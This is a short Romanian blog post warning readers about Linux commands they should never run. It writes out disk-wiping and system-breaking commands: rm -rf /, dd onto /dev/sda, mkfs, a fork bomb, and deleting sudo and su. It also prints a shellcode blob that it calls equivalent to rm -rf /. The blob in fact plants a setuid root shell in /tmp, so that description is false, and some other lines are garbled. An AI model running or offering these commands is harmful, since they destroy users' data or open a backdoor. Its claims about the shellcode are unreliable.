Dec 22, 2015

Comenzi in linux care NU trebuie sa le executati nici-o data


Comenzi care va sterg directorul home, root sau intregul harddisk

Cod:

    * sudo rm -rf /
    * rm -rf .*
    * dd if=/dev/zero of=/dev/sda
    * mkfs.ext3 /dev/hda
    * whatever > /dev/hda
    * cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
    * find -type f -mtime +30 -exec mv {} /dev/null \;
    * mv ~ /dev/null
    * mv / /dev/null

kernel panic
Cod:

    * dd if=/dev/random of=/dev/port
    * :(){:|:&};: #also known as fork bomb

o comanda "alambicata" identica cu rm -rf /
Cod:

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68?
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99?
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7?
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56?
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31?
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69?
“\x6e\x2f\x73\x68\x00\x2d\x63\x00?
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

nu iti mai permite sa executi nimic cu drept de administrator
Cod:

rm -f /usr/bin/sudo;rm -f /bin/su

si ar mai fi
Cod:

chmod -r 777 . /*

# [ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo “You live”

cd ~; for x in `ls`; do mv -f $x $y; y=$x; done

rm -rf –no-preserve-root /
Cod:

rm -rf /dev || rm -rf /bin

care blocheaza chmod
Cod:

chmod -x /bin/*
chmod -x /usr/bin/*
chmod -x /usr/local/bin/*

0 comentarii:

Post a Comment

 
Copyright @ 2018 SasNet Romania - Invatam Impreuna. Designed By SasNet
 photo sasnet-nu-copia-ca-te-dau-in-judecata-si-vei-lucra-toata-viata-pentru-mine_zps2tdgcqhs.png